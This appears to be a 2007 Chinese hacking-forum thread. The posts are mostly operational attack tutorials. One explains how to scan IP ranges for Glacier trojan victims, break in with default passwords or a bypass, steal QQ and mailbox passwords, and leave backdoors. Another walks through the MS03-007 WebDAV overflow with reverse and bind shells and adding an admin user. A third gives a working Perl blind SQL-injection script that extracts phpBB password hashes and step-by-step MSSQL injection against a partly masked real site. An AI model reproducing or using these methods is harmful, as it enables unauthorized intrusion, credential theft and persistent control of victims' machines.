双击桌面上的代理猎手快捷图标,进入代理猎手主操作台.点击左上角三角形下面的“搜索任务”,点击下面的“添加任务”,进入“添加搜索任务”窗口,任务类型选“搜索网址范围”,按“下一步”,进入地址范围窗口,接着按右边的“添加”,在弹出的窗口中,地址范围类型选“起止地址范围”,起止地址填上你要扫描的IP段(例如61.150.0.0)结束地址填上例如(61.150.255.255),按“确定”,见到我刚才填的IP段出现在窗口中。接着按“下一步”,进入端口和协议窗口,按右边的“添加”,在弹出的小窗口中选“单一端口”,下面数字框中填上冰河的默认端口7626协议选“HTTP”,在旁边的“必搜”前打上钩。按“确定”,就看到了我刚才填的端口和协议出现在窗口中,按“完成”,这时回到添加前的窗口。看到框框中已有了我刚才填的内容 ,左上角的三角形也由开始的灰色变了现在的蓝色,这时按下这个三角形就开始了我的第一次搜索任务(这时操作台下面的数字会不停的跳动,表示正搜索中),这时按下红色停止按钮下面的“搜索结果”按钮,就看到了搜索的结果,如果有端口7626开的机器扫到,就会在窗口中显示该机的IP地址,(验证超时那些先不要理它,反正它的端口7626是打开了),如果你选IP段好运的话,很快就会有机器被你扫描到!你不仿等到扫描到的机器有多几个时才停止扫描,这样你进别人的机器跳舞的机会就大大提高了!如果你真的那么倒霉扫不到的话,就换IP段来搜吧.不过要记住把先前的搜索任务删除掉再添加新的搜这里有一点要告诉你,代理猎手的其他设置你先不要搞(其余都是默认的),就按我上面提到的做就行了!好了,扫描到了一大堆的IP了,GO GO GO 进入主要的一步了。。。。。

二。连接篇:
运行冰河2.2客户端,进入操作台,点击左上角"添加主机"按钮,在弹出的窗口中,显示名称处填上我刚才扫描到的IP,密码先不填,端口填默认的7626.按"确定",这时看到了填入的IP出现在主操作台左边的窗口中了.重复上面的这一步,把扫描到的IP全部都填进去(省去了等一下连接一个填一次的麻烦),看到了所有的IP都填进去后,就开始了我们的第一次入侵(这里有一点要提醒一下的是,你在连接前一定要把你的防火墙和病毒监控关了).好了,双击操作台左边看到的IP,下面的状态条会滚动,等待一下,看看返回来什么信息.如果是"主机没有响应"或者"无法与主机连接",试多几次,还是一样的话,可能对方已离线或打开7626端口的不是冰河的服务端,就选下一个IP.好了,这个能连接,但返回的信息是"口令有误..."那这个我可以搞店了,先试冰河的通用密码,具体操作如下:右键点击该IP,在弹出菜单中选"修改",进入刚才添加IP的窗口,在"访问口令"处填上你所选的通用密码,按"确定".再到主操作台上"当前连接"的下拉菜单中找到你刚才修改了口令的IP,点击一下,看到"访问口令"处出现了多个"*******"号,这就是你填上的冰河通用密码了,再按一下旁边的"应用",再双击操作台左边该IP,就尝试再次连接,当看到"正在接收数据""完成"等字样时,呵呵,你已成功了.这部机你有了一切的操纵权了.看到了他的机器的分盘(C.D.E.F.G.等)在右边的屏幕中出现了,双击这个小图标,你就可以看到他的硬盘中的文件夹列表和文件,再通过用鼠标右键点击文件夹或文件,你就可以使用"复制","粘贴",删除","下载"等等功能了,你也可以上传一个文件给他远程打开,呵呵.如果你上传的是另一个木马,那他的机就又多中了一个马儿了..具体做什么自己想吧.去看看他在干什么吧,点击操作台上方"查看屏幕"按钮,图象格式处选"JPEG",(因为JPEG图象传输速度比BMP的传输速度要快),按确定,等一下一个小的屏幕就出来啦,这个就是对方的屏幕画面了,右键点击该小屏幕,在"自动跟踪"和"自动缩放"前打上钩,那么这个小屏幕就会跟随对方的屏幕变化而变化了.再去点击"命令控制台",看到各个命令类按钮,双击各个按钮会有不同的命令出了,你可以在"口令类命令"下的"历史口令"处查看他的QQ密码,上网密码等等,在"设置类命令"下的"服务器配置"中读取该冰河服务端的配置信息,也就是刚才阻档你连接的设置了的密码,要是对方有设置IP邮寄的话你也可以看到他的信箱号,用这个密码你或许能破了他的信箱(我用这个方法也真的破了好几个人的信箱哦,呵呵),你也可以修改了他的配置,换了你自己的密码和邮寄信箱.你也可以帮他的硬盘创建共享.以后他把冰河杀了你也可以用共享连接他啊!(等于给自己多留了个后门)其他功能就不说了,你自己慢慢去尝试吧!
还有一种情况,就是你尝试了所有的通用密码都不能连接的话,就试试小飞刀原创的冰河漏洞吧,具体操作如下:当你用完了通用密码后还是显示"密码有误......",就去点击操作台窗口中的"我的电脑",在你的文件中找到你的冰河服务端,右键点选"远程打开",这时你依然看到是"密码有误....",但马上又多了一条传输进度条出来,显示正在传送文件,当看到了进度条完成后,下面的提示也变了,会显示"文件传送完毕"和"文件打开成功".这样你就可以不用密码连接进去了.(记住要先把你刚才填进去的密码删了,按"应用".当返回的信息是"文件传送完毕"和"文件打开失败"时,你可以上传其他的木马服务端(例如黑洞,公牛等等木马都可以)上去,这样也可以控制对方,但已不是用冰河客户端了,而是换了相对应的木马客户端.
咳咳........进去后可别干坏事哦!

其实玩了这么多的木马还是觉得冰河是再好用的(呵呵.这只是个人观点,你有好用的木马就告诉我一声吧),功能多多,易用,而且中冰河的机器也是再多的.其他功能就不一一说了..(呵呵呵.堂主水平有限,看了可别笑掉牙,我可没钱给你补牙)
tmd88600

ZxID:1279065

等级: 禁止发言
配偶: 琳儿来也
举报 只看该作者 70楼  发表于: 2007-11-16 0
溢出专集


2003年3月18日,微软发布MS03-007号安全公告:Microsoft IIS 5.0 WebDAV远程溢出漏洞,声称利用此漏洞溢出后可以得到localsystem权限,于是网上沸沸扬扬开始关注起此漏洞。到了3月下旬,发现此漏洞的老外发布了他的exploit,不过由于这个exploit是针对英文版的win2000的,所以对国内造成的影响不大。直至3月27日,国内某黑客在安全焦点上公布了其修改后的针对中文版win2000的此漏洞的exploit程序,于是第二天即3月28日,国内的各个黑客网站都纷纷提供了编译好的win平台下的WebDAV漏洞溢出攻击程序的下载,各个安全论坛便随处可见关于WebDAV远程溢出攻击的讨论,甚至更有甚者把溢出攻击过程做成了动画教程供人观摩,WebDAV漏洞溢出攻击在一夜之间"迅速走红"。而且,其攻击代码在3月29日时又被人改进,使其成功率又大幅提高,眼下WebDAV远程溢出攻击已经成为各种黑客最流行的攻击方法,其来势之迅速之猛烈是以前Unicode、printer等漏洞所不及,而且有被蠕虫制造者利用的可能,所以笔者认为有必要写此文章让广大网管和用户尽早了解这个漏洞情况及解决方案,以提高警惕、做好防范。
一、 漏洞基本情况
1、 漏洞名称及描述
名称:Microsoft Windows 2000 WebDAV远程缓冲区溢出漏洞
微软安全公告:MS03-007
Unchecked Buffer In Windows Component Could Cause Web Server Compromise(815021)
地址http://www.microsoft.com/technet/security/bulletin/MS03-007.asp
描述:IIS 5.0包含的WebDAV组件不充分检查传递给部分系统组件的数据,远程攻击者利用这个漏洞
对WebDAV进行缓冲区溢出攻击,可能以Web进程权限在系统上执行任意指令。
2、 受影响系统



Microsoft IIS 5.0
- Microsoft Windows 2000 Professional/Server/
Datacenter Server SP3
- Microsoft Windows 2000 Professional/Server/
Datacenter Server SP2
- Microsoft Windows 2000 Professional/Server/
Datacenter Server SP1
- Microsoft Windows 2000 Professional/Server/
Datacenter Server



3、 什么是WebDAV组件
Microsoft IIS 5.0 (Internet Information Server 5)是Microsoft Windows 2000自带的一个网络
信息服务器,其中包含HTTP服务功能。IIS5默认提供了对WebDAV的支持,WebDAV(基于Web的分布式写作和改写)是一组对HTTP协议的扩展,它允许用户协作地编辑和管理远程Web服务器上的文件。使用WebDAV,可以通过HTTP向用户提供远程文件存储的服务,包括创建、移动、复制及删除远程服务器上的文件,但是作为普通的HTTP服务器,这个功能不是必需的。
4、 漏洞产生的原因
这个漏洞产生的原因具体是由于WebDAV使用了ntdll.dll中的一些API函数,而这些函数存在一个缓
冲区溢出漏洞,而Microsoft IIS 5.0带有WebDAV组件对用户输入的传递给ntdll.dll程序处理的请求未作充分的边界检查,远程入侵者可以通过向WebDAV提交一个精心构造的超长的数据请求而导致发生缓冲区溢出,成功利用这个漏洞可以获得LocalSystem权限,这意味着入侵者可以获得主机的安全控制能力。所以确切地说,这个漏洞并不是IIS造成的,而是ntdll.dll里面的一个API函数造成的。也就是说,很多调用这个API的应用程序都存在这个漏洞。
5、 测试代码:见附件
WebDAV远程缓冲区溢出漏洞的基本情况我们这里介绍到这里了,如果读者有兴趣想进一步了解这个漏
洞具体的溢出原理分析,建议可以去安全焦http://www.xfocus.net/中参阅isno写的两篇关于WebDAV远程溢出漏洞分析的文章,很精彩!我这里就不班门弄斧了。
二、如何检测漏洞
在上面介绍漏洞基本情况的时候,我们已经说了IIS 5.0的默认配置是提供了对WebDAV的支持,也就是说,如果你的win 2000提供了IIS服务而没有打过针对此漏洞的补丁,那么一般情况下你的IIS就会存在这个漏洞,但如何来确定呢?我们可以借助一些工具来帮我们进行检测。
1、 第一个检测工具:Ptwebdav.exe
下载地址http://www.ttian.net/txt/show.php?id=10
简介:Ptwebdav.exe是一个老外写的专门用来远程检测Windows 2000 IIS 5.0服务器是否存在WebDAV
远程缓冲区溢出漏洞的东东,其操作界面非常简单,只要在其"IP or hostname"中填入要检测的主机和IIS服务端口,然后按"check"就可以了。笔者正用它来检测本地主机是否存在WebDAV漏洞,一会儿它就会在下面窗口里显示结果。这个工具不错,但它每次只能检测一台机子,如果你想检测一个网段内所有主机就比较麻烦了,一台台地检测不知道要检测到什么时候。让我们来看看第二个检测软件,它能帮我们解决这个问题。
2、 第二个检测工具:WebDAVScan v1.0
下载地址http://www.cnhonker.net/Down/show.php?id=65&;;down=1
简介:WebDAVScan是一个专门用于检测网段内的Microsoft IIS 5.0服务器是否提供了对WebDAV的
支持的扫描器,软件非常小,只有7.23KB,而且是个绿色软件,无须安装,直接运行即可!扫描后如有此安全漏洞,软件会自动生成扫描报告,原来也是老外写的,不过我们这里用的是WebDAVScan的汉化版。笔者扫描X.X.23.1-X.X.23.254的网段大概用了30秒时间,速度很快,窗口右边显示的是结果,"Enable"表示了此IIS支持WebDAV,至于有没有漏洞要看它有没有打过补丁了。经笔者测试,这个软件确实很不错,推荐大家使用,好了,WebDAV的检测也介绍完了,下面我们开始讲利用此漏洞测试攻击了。
二、 漏洞测试攻击
自从WebDAV的exploit代码出现后,网上紧接着就出现了好几种版本的溢出攻击程序,虽然其核心
代码类似,但具体的功能和操作还是有些区别的,我们这里来了解两个WebDAV的溢出攻击程序。
1、 第一个溢出程序:wb.exe
下载地址http://www.longker.com/txt/opensoft.asp?soft_id=131&;;url=1
简介:wb.exe是一个win32平台下已经编译好的针对英文版的IIS--webdav远程溢出攻击
程序,原代码的作者是Crpt的kralor,使用时行用Netcat在本地监听某个端口,如nc -L -p 666,然后使用此程序对远程主机进行溢出攻击,溢出成功后就能在本地监听口上获取远程主机的反向连接,获取localsystem权限的cmdshell,它需要指定远程主机反向连接主机IP、端口、补丁信息等参数:syntax: c:K_WEBDAV.EXE<victim_host><your_host><your_port>[padding],如wb targetserver.com your_ip 666 3 ,攻击如果成功,那Netcat的监听窗口就会出现远程主机的shell。
2、 第二个溢出程序:webdavx.exe
下载地址http://www.longker.dom/txt/opensoft.asp?soft_id=135&;;url=1
简介:webdavx.exe是一个针对中文版server溢出程序,它是根据安全焦点Isno的perl代码编译成
的,这个版本只对中文版的有效,它的使用也不同于wb.exe,它溢出成功后直接在目标主机的7788端口上捆定一个localsystem权限的cmdshell,不像wb.exe需要反向连接,入侵者只要telnet到7788端口就可以了,所以用它在局域网内也能对局域网的主机进行攻击,当然wb.exe使用反向连接也有它的好处,因为许多WEB服务器的防火墙都设置为只允许通过到端口80的TCP连接,这样即使开了7788端口你也连接不上,而使用反向连接可以突破防火墙的TCP过滤,所以这两个软件各有用处各有特点,可以根据不同的需要进行选择。
3、 测试攻击实例
虽然讲了两个攻击软件的用法,但都只是纸上谈兵,我们还是来实际测试一下这个漏洞的威力如何!
我们测试的是中文版的IIS主机,使用的扫描软件是WebDAVScan的汉化版,攻击软件是webdavx.exe,为了输入方便,我把webdavx.exe改名为web.exe,在刚才介绍WebDAVScan 的时候我们已经扫描到的IIS支持WebDAV的主机中选一台,找开CMD,输入:



c:web 2x..x.23.68
send buffer…(正在溢出)

telnet target 7788(溢出完成,请尝试telnet连接目标主机的7788端口)

c:telnet 2x..x.23.68 7788
正在连接到2x..x.23.68…
Microsoft Windows 2000[Version 5.00.2195]

<C>版权所有制1985-2000Microsoft Corp
c:winntsystem32> (溢出成功,已经连接到其7788端口)



当然事情上溢出不一定成功,如果telnet连接提示失败就说明溢出可能不成功,这里是笔者N次试验的结果,不过现在webdavx.exe的溢出代码重新进行了改进,其溢出成功率大幅提高,估计在1/2左右。而且得到的应该是system权限,比超级用户还高一级,可以加个administrator组的成员来试试:
c:winntsystem32>net user hacker 111111 /add
The command completed successfully
C:winntsystem32>net localgroup administrators hacker /add
The command completed successfully
命令成功了,看来System权限是真的了,那不是可在机器上干任何事情了?还真有点可怕!好了,我们这里只是测试,到此就停止吧!
三、 漏洞消除方案
我们上面已经看到了WebDAV远程溢出攻击的威力了吧,而到本文截稿为止,国内网络上的WebDAV远
程溢出攻击是越来越多了,你的IIS服务器一不小心就有可能被黑客攻击而成为被控制的傀儡,所以管理员和用户们千万不能大意,一定要尽快地堵上这个漏洞,千万不能再重演像MSSQL的远程溢出漏洞那样的惨痛教训了。具体的可以通过以下几个方案来解决:
⑴ 安装补丁,目前微软已经提供了此漏洞的补丁,下载地址http://microsoft.com/downloads/
details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en
或者,你也可以作用微软提供的IIS Lockdown工具来防止该漏洞被利用。
⑵ 如果你不能立刻安装补丁或升级,也可以手工修补这个漏洞,我们上面已经说了WebDAV功能对一般的Web服务器来说并不需要,所以可以把它停止掉。WebDAV在IIS 5.0 WEB服务器上的实现是由Httpext.dll完成,默认安装,但是简单更改Httpext.ell不能修正此漏洞,因为WINDOWS 2000的WFP功能会防止系统重要文件破坏或删除。要完全关闭WebDAV包括的PUT和DELETE请求,需要对注册表进行如下更改:
启动注册表编辑器,搜索注册表中的如下键:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW3SVCParameters
找到后点击"编辑"菜单,点击"增加值",然后增加如下注册表键值:
value name: DisableWebDAV
Data typeWORD
value data: 1
最后别忘了重新启动IIS,只有重启IIS后新的设置才会生效
tmd88600

ZxID:1279065

等级: 禁止发言
配偶: 琳儿来也
举报 只看该作者 71楼  发表于: 2007-11-16 0
NET START可以起用命令一览表


Net start
启动服务,或显示已启动服务的列表。两个或多个词组成的服务名,例如 Net Logon 或 Co
mputer Browser,必须两边加引号 (")。
net start [service]
参数

键入不带参数的 net start 显示正在运行服务的列表。
service
包括 alerter、client service for netware、clipbook server、content index、comput
er browser、dhcp client、directory replicator、eventlog、ftp publishing service、
hypermedia object manager、logical disk manager、lpdsvc、media services managemen
t, messenger、Fax Service、Microsoft install server、net logon、network dde、netw
ork dde dsdm、nt lm security support provider、ole、plug and play、remote access
connection manager、remote access isnsap service、remote access server、remote pr
ocedure call (rpc) locator、remote procedure call (rpc) service、schedule、server
、simple tcp/ip services、site server ldap service、smartcard resource manager、s
nmp、spooler、task scheduler、tcp/ip netbios helper、telephony service、tracking
service、tracking (server) service、ups、Windows time service 和 workstation。
下面服务只有在 Windows 2000 上可用:file service for macintosh、gateway service
for netware、microsoft dhcp service、print service for macintosh、windows interne
t name service。

Net start Alerter
启动“警报器”服务。“警报器”服务发送警告消息。
Net start Alerter
Net start Client Service for NetWare
启动“NetWare 客户服务”。该命令只有在安装了 NetWare 客户服务的情况下才能在 Wind
ows 2000 Professional 上使用。
net start "client service for netware"
Net start ClipBook Server
启动“剪贴簿服务器”服务。两个单词组成的服务名,例如 ClipBook Server,必须两边加
引号 (")。
net start "clipbook server"

Net start Computer Browser
启动“计算机浏览器”服务。
net start "computer browser"

Net start DHCP Client
启动“DHCP 客户”服务。该命令只有在安装了 TCP/IP 协议之后才可用。
net start "dhcp client"

Net start Directory Replicator
启动“目录复制程序”服务。“目录复制程序”服务将指定的文件复制到指定服务器上。两
个词组成的服务名,例如 Directory Replicator,必须两边加引号 (")。也可以用命令 net
start replicator 启动该服务。
net start "directory replicator"

Net start Eventlog
启动“事件日志”服务,该服务将事件记录在本地计算机上。必须在使用事件查看器查看记
录的事件之前启动该服务。
net start Eventlog

Net start File Server for Macintosh
启动 Macintosh 文件服务,允许 Macintosh 计算机使用共享文件。该命令只能在运行 Win
dows 2000 Server 的计算机上可用。
net start "file service for macintosh"
Net start FTP Publishing Service
启动 FTP 发布服务。该命令只有在安装了 Internet 信息服务后才可用。
net start "ftp publishing service"
Net start Gateway Service for NetWare
启动 NetWare 网关服务。该命令只有在安装了 NetWare 网关服务的情况下才能在 Windows
2000 Server 上可用。
net start "gateway service for netware"
Net start Lpdsvc
启动 TCP/IP 打印服务器服务。该命令只有在 UNIX 打印服务和 TCP/IP 协议安装后方可使
用。
net start lpdsvc

Net start Messenger
启动“信使”服务。“信使”服务允许计算机接收邮件。
net start messenger

Net start Microsoft DHCP Service
启动 Microsoft DHCP 服务。该命令只有在运行 Windows 2000 Server 并且已安装 TCP/IP
协议和 DHCP 服务的情况下才可用。
net start "microsoft dhcp service"

Net start Net Logon
启动“网络登录”服务。“网络登录”服务验证登录请求并控制复制用户帐户数据库域宽。
两个词组成的服务名,例如 Net Logon,必须两边加引号 (")。该服务也可以使用命令 net
start netlogon 启动。
net start "net logon"

Net start Network DDE
启动“网络 DDE”服务。
net start "network dde"
Net start NT LM Security Support Provider
启动“NT LM 安全支持提供程序”服务。该命令只有在安装了“NT LM 安全支持提供程序”
后才可用。
net start "nt lm security support provider"
Net start OLE
启动对象链接和嵌入服务。
net start ole
Net start Print Server for Macintosh
启动 Macintosh 打印服务器服务,允许从 Macintosh 计算机打印。该命令只能在运行 Win
dows 2000 Server 的计算机上可用。
net start "print server for macintosh"
Net start Remote Access Connection Manager
启动“远程访问连接管理器”服务。该命令只有在安装了“远程访问服务”后才可用。
net start "remote access connection manager"
Net start Remote Access ISNSAP Service
启动“远程访问 ISNSAP 服务”。该命令只有在安装了“远程访问服务”后才可用。
net start "remote access isnsap service"
Net start Remote Procedure Call (RPC) Locator
启动 RPC 定位器服务。“定位器”服务是 Microsoft Windows 2000 的 RPC 名称服务。
net start "remote procedure call (rpc) locator"

Net start Remote Procedure Call (RPC) Service
启动“远程过程调用 (RPC) 服务”。“远程过程调用 (RPC) 服务”是 Microsoft Windows
2000 的 RPC 子系统。RPC 子系统包括终结点映射器和其他各种 RPC 服务。
net start "remote procedure call (rpc) service"

Net start Schedule
启动“计划”服务。“计划”服务使计算机可以使用 at 命令在指定时间启动程序。
net start schedule

Net start Server
启动“服务器”服务。“服务器”服务使计算机可以共享网络上的资源。
net start server

Net start Simple TCP/IP Services
启动“简单 TCP/IP 服务”服务。该命令只有在安装了 TCP/IP 和“简单 TCP/IP 服务”后
才可以使用。
net start "simple tcp/ip services"
Net start Site Server LDAP Service
启动“Site Server LDAP 服务”。“Site Server LDAP 服务”在 Windows 2000 Active D
irectory 中发布 IP 多播会议。该命令只有在安装了“Site Server LDAP 服务”后才可以使
用。
net start "site server ldap service"

Net start SNMP
启动 SNMP 服务。SNMP 服务允许服务器向 TCP/IP 网络上的 SNMP 管理系统报告当前状态。
该命令只有在安装了 TCP/IP 和 SNMP 后才可以使用。
net start snmp

Net start Spooler
启动“后台打印程序”。
net start spooler
Net start TCP/IP NetBIOS Helper
在 TCP 服务上启用 Netbios 支持。该命令只有在安装了 TCP/IP 才可用。
net start "tcp/ip netbios helper"
Net start UPS
启动“不间断电源 (UPS)”服务
net start ups

Net start Windows Internet Name Service
启动“Windows Internet 命名服务”。该命令只有在安装了 TCP/IP 和“Windows Interne
t 命名服务”后在 Windows 2000 Servers 上才可以使用。
net start "windows internet name service"

Net start Workstation
启动“工作站”服务。“工作站”服务使计算机可以连接并使用网络资源。
net start workstation
Net start Schedule
有的地方称为“定时”服务,叫法不同,请大家注意了,其实是一回事!
Net start Telnet
启动telnet服务,打开23端口,有的情况下需先运行NTLM.exe。为什么?到榕G的说明里去找
吧!
net start workstation
打开NET USE
net start lanmanserver
打开 IPC 服务。
开FTP命令是:net start msftpsvc
Net start
启动服务,或显示已启动服务的列表。两个或多个词组成的服务名,例如 Net Logon 或 Co
mputer Browser,必须两边加引号 (")。
net start [service]
参数

键入不带参数的 net start 显示正在运行服务的列表。
service
包括 alerter、client service for netware、clipbook server、content index、comput
er browser、dhcp client、directory replicator、eventlog、ftp publishing service、
hypermedia object manager、logical disk manager、lpdsvc、media services managemen
t, messenger、Fax Service、Microsoft install server、net logon、network dde、netw
ork dde dsdm、nt lm security support provider、ole、plug and play、remote access
connection manager、remote access isnsap service、remote access server、remote pr
ocedure call (rpc) locator、remote procedure call (rpc) service、schedule、server
、simple tcp/ip services、site server ldap service、smartcard resource manager、s
nmp、spooler、task scheduler、tcp/ip netbios helper、telephony service、tracking
service、tracking (server) service、ups、Windows time service 和 workstation。
下面服务只有在 Windows 2000 上可用:file service for macintosh、gateway service
for netware、microsoft dhcp service、print service for macintosh、windows interne
t name service。

Net start Alerter
启动“警报器”服务。“警报器”服务发送警告消息。
Net start Alerter
Net start Client Service for NetWare
启动“NetWare 客户服务”。该命令只有在安装了 NetWare 客户服务的情况下才能在 Wind
ows 2000 Professional 上使用。
net start "client service for netware"
Net start ClipBook Server
启动“剪贴簿服务器”服务。两个单词组成的服务名,例如 ClipBook Server,必须两边加
引号 (")。
net start "clipbook server"

Net start Computer Browser
启动“计算机浏览器”服务。
net start "computer browser"
tmd88600

ZxID:1279065

等级: 禁止发言
配偶: 琳儿来也
举报 只看该作者 72楼  发表于: 2007-11-16 0
PHP注入实例

在网上很难看到一篇完整的关于php注入的文章和利用代码,于是我自已把mysql和php硬啃了几个星期,下面说说我的休会吧,希望能抛砖引玉!
相信大家对asp的注入已经是十分熟悉了,而对php的注入比asp要困难,因为php的magic_gpc选项确实让人头疼,在注入中不要出现引号,而php大多和mysql结合,而mysql的功能上的缺点,从另外一人角度看确在一定程度上防止了sql njection的攻击,我在这里就举一个实例吧,我以phpbb2.0为例:
在viewforum.php中有一个变量没过滤:
if ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ││ isset($HTTP_POST_VARS<pOST_FORUM_URL]) )
{
$forum_id = ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ) ? intval($HTTP_GET_VARS<pOST_FORUM_URL]): intval

($HTTP_POST_VARS<pOST_FORUM_URL]);
}
else if ( isset($HTTP_GET_VARS['forum']))
{
$forum_id = $HTTP_GET_VARS['forum'];
}
else
{
$forum_id = '';
}
就是这个forum,而下面直接把它放进了查询中:
if ( !empty($forum_id) )
{
$sql = "SELECT *
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Could not obtain forums information', '', __LINE__, __FILE__, $sql);
}
}
else
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

如果是asp的话,相信很多人都会注入了.如果这个forum_id指定的论坛不存在的话,就会使$result为空,于是返回Could not obtain forums information的信息,于是下面的代码就不能执行下去了
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id) /****************************************

关键就是打星号的那一行了,这里是一个函数session_pagestart($user_ip, $thispage_id),这是在session.php中定义的一个函数,由于代码太

长,就不全贴出来了,有兴趣的可以自已看看,关键是这个函数还调用了session_begin(),函数调用如下session_begin($user_id, $user_ip,

$thispage_id, TRUE)),同样是在这个文件中定义的,其中有如下代码
$sql = "UPDATE " . SESSIONS_TABLE . "
SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page =

$page_id, session_logged_in = $login
WHERE session_id = '" . $session_id . "'
AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) ││ !$db->sql_affectedrows() )
{
$session_id = md5(uniqid($user_ip));

$sql = "INSERT INTO " . SESSIONS_TABLE . "
(session_id, session_user_id, session_start, session_time, session_ip, session_page,

session_logged_in)
valueS ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
if ( !($result = $db->sql_query($sql)) )
{
message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', __LINE__, __FILE__,

$sql);
}


在这里有个session_page在mysql中定义的是个整形数,他的値$page_id,也就是$forum_id,如果插入的不是整形就会报错了,就会出现Error

creating new session : session_begin的提示,所以要指这$forum_id的值很重要,所以我把它指定为:-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57,没有引号吧!虽然指定的是一个不存在的forum_id但他返回的查询结果可不一定是为空,这个就是猜user_id为2的用户的第一位密码的ascii码值是是否为57,如果是的话文章中第一段代码中的$result可不为空了,于是就执行了ession_pagestart这个有问题的函数,插入的不是整数当然就要出错了,于是就显示Error creating new session : session_begin,就表明你猜对了第一位了,其它位类似.

如果没有这句出错信息的话我想即使注入成功也很难判断是否已经成功,看来出错信息也很有帮助啊.分析就到这里,下面附上一段测试代码,这段代码只要稍加修改就能适用于其它类似的猜md5密码的情况,这里我用的英文版的返回条件,中文和其它语言的只要改一下返回条件就行了.

use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;
$ua = new LWP::UserAgent;

print " ***********************
";
print " phpbb viewforum.php exp
";
print " code by pinkeyes
";
print " www.icehack.com
";
print " ************************
";
print "please enter the weak file's url:
";
print "e.g. http://192.168.1.4/phpBB2/viewforum.php
";
$adr=<STDIN>;
chomp($adr);
print "please enter the user_id that you want to crack
";
$u=<STDIN>;
chomp($u);
print "work starting,please wait!
";
@pink=(48..57);
@pink=(@pink,97..102);
for($j=1;$j<=32;$j++){
for ($i=0;$i<@pink;$i++){
$url=$adr."?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%

20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
$request = HTTP::Request->new('GET', "$url");
$response = $ua->request($request);

if ($response->is_success) {
if ($response->content =~ /Error creating new session/) {
$pwd.=chr($pink[$i]);
print "$pwd
";
}

}
}
}
if ($pwd ne ""){
print "successfully,The password is $pwd,good luck
";}
else{
print "bad luck,work failed!
";}

至于以前的phpbb2.0.6的search.php的问题利用程序只要将上面代码稍加修改就行了。

主要是看过程,学习作者思维!
SQL注入新技巧


SQL注入的新技巧
表名和字段名的获得
适用情况:
1)数据库是MSSQL
2)连接数据库的只是普通用户
3)不知道ASP源代码

可以进行的攻击
1)对数据内容进行添加,查看,更改

实例:
本文件以
http://www.dy***.com/user/wantpws.asp
为列进行测试攻击。

第一步:
在输入用户名处输入单引号,显示
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
字符串 ''' 之前有未闭合的引号。

/user/wantpws.asp,行63

说明没有过滤单引号且数据库是MSSQL.

第二步:
输入a';use master;--
显示
Microsoft OLE DB Provider for SQL Server 错误 '80040e21'
多步 OLE DB 操作产生错误。如果可能,请检查每个 OLE DB 状态值。没有工作被完成。

/user/wantpws.asp,行63
这样说明没有权限了。

第三步:
输入:a' or name like 'fff%';--
显示有一个叫ffff的用户哈。

第四步:
在用户名处输入
ffff' and 1<>(select count(email) from [user]);--
显示:
Microsoft OLE DB Provider for SQL Server 错误 '80040e37'
对象名 'user' 无效。

/user/wantpws.asp,行96

说明没有叫user的表,换成users试试成功,同时说明有一个叫email的列.
(东方飘云的一个办法是输入a' having 1=1--
一般返回如下也就可以直接得到表名和一个字段名了
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
列 'users.ID' 在选择列表中无效,因为该列未包含在聚合函数中,并且没有 GROUP BY 子句。

/user/wantpws.asp,行63


)

现在我们知道了ffff用户的密码是111111.

下面通过语句得到数据库中的所有表名和字段名。

第五步:
输入:
ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
说明:
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID
ffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--
同上可知id是:581577110
由于对象标志id是根据由小到大排列的所以我们可以得到所有的用户表的名字了
象下面这样就可以得到第二个表的名字了
ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--

ad 581577110
users 597577167
buy 613577224
car 629577281
learning 645577338
log 661577395
movie 677577452
movieurl 693577509
password 709577566
type 725577623
talk

经过一段时间的猜测后我们得到上面的分析一下应该明白password,users是最得要的

第六步:猜重要表的字段
输入:
现在就看看users表有哪些字段
ffff';update [users] set email=(select top 1 col_name(object_id('users'),3) from users) where name='ffff';--
得到第三个字段是password
ffff';update [users] set email=(select top 1 col_name(object_id('users'),4) from users) where name='ffff';--
得到第四个字段是name
最后users表的字段共28个全得到了
(注:另一个得到字段的办法,前提是系统的返回出错信息
a' group by ID having 1=1--
得到
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
列 'users.userid' 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。

/user/wantpws.asp,行63
这个第二个字段就是userid
显示第三个字段。
a' group by id,userid having 1=1--

Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
列 'users.password' 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。

/user/wantpws.asp,行63
得到是password
同理,一直显示出所有。:)
)

users表
1 2 3 4
id userid password name

5 6 7 8 9 10 11 12 13 14 15 16
Province homeaddress city adress starlook sex email nlook nos date money send

17 18 19 20 21 22 23 24 25 26 27 28
oklook dnlook lasthits phone askmejoin getmoney payno logintime mflag state post note


